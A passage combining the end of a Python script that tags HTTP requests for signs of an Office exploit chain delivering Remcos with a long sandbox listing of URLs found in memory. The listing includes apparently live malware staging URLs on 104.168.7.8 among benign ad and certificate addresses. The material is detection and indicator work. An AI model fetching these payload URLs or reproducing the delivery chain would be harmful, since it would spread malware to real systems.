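        return f"http://{self.host}{self.path}"


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.x request (request line plus headers) as the sandbox captured it."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:  # the blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def triage(req: HttpRequest) -> List[str]:
    """Return the tags that fire for one request; an empty list means nothing notable."""
    tags: List[str] = []
    ua = req.headers.get("user-agent", "").lower()
    bare_ip = bool(BARE_IPV4.match(req.host))
    m = re.search(r"(\.[A-Za-z0-9]+)$", req.path.split("?", 1)[0])
    ext = m.group(1).lower() if m else ""

    # Office's own HTTP stack advertises "ms-office"; a document pulled that way from a bare IP
    # is what the report's "Office viewer loads remote template" looks like on the wire.
    if "ms-office" in ua and bare_ip and ext in TEMPLATE_EXT:
        tags.append("office_remote_template")
    # Follow-on downloads: bare-IP host, no Referer, payload-like extension (heuristic).
    if bare_ip and "referer" not in req.headers and ext in STAGED_EXT:
        tags.append("staged_payload_from_ip")
    # .NET WebClient sends no User-Agent by default; the report ties RFGB.txt to powershell.exe.
    if "user-agent" not in req.headers and bare_ip:
        tags.append("no_user_agent")
    # Remcos fetches the victim's public IP/geolocation from geoplugin.net (RegAsm.exe in the report).
    if req.host == "geoplugin.net" and req.path.startswith("/json.gp"):
        tags.append("remcos_geoip_check")
    return tags


def run(raw_requests: List[str]) -> Dict[str, List[str]]:
    """Map each request URL to the tags that fired for it."""
    return {r.url: triage(r) for r in map(parse_request, raw_requests)}


def extract_iocs(raw_requests: List[str]) -> Dict[str, List[str]]:
    """Hosts and full URLs to block or hunt for, de-duplicated and sorted."""
    reqs = [parse_request(r) for r in raw_requests]
    return {"hosts": sorted({r.host for r in reqs}), "urls": sorted(r.url for r in reqs)}


if __name__ == "__main__":
    for url, tags in run(SAMPLE_REQUESTS).items():
        print(f"{url}\n    {', '.join(tags) or '-'}")
    print(extract_iocs(SAMPLE_REQUESTS))
```

Feeding proxy or IDS request logs through run() instead of SAMPLE_REQUESTS gives the same per-URL tags; the geoplugin check is the one rule that does not depend on the staging IP, so it survives infrastructure rotation.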
Source: powershell.exe, 0000000C.00000002.407271629.00000000026A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.7.8
Source: powershell.exe, 0000000C.00000002.407271629.00000000026A7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.7.8/510/RFGB.txt
Source: RN on 104.168.7.8.url.0.dr | String found in binary or memory: http://104.168.7.8/510/RN/
Source: EQNEDT32.EXE, 00000008.00000002.389469062.000000000053F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.7.8/510/niceworkwithpcitureupdateson.tIF
Source: EQNEDT32.EXE, 00000008.00000002.389469062.000000000053F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.7.8/510/niceworkwithpcitureupdateson.tIFj
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://acdn.adnxs.com/ast/ast.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://b.scorecardresearch.com/beacon.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
Source: RegAsm.exe, 0000000D.00000002.919651598.0000000000305000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.919771377.000000000034F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 0000000C.00000002.407271629.0000000002741000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 0000000C.00000002.406976766.00000000001BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.cg
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
Source: bhv76C6.tmp.15.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
Source: bhv76C6.tmp.15.dr | String found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: powershell.exe, 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000C.00000002.409842659.0000000005172000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
Source: powershell.exe, 0000000A.00000002.412884295.000000000263F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407271629.0000000002401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.dr | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
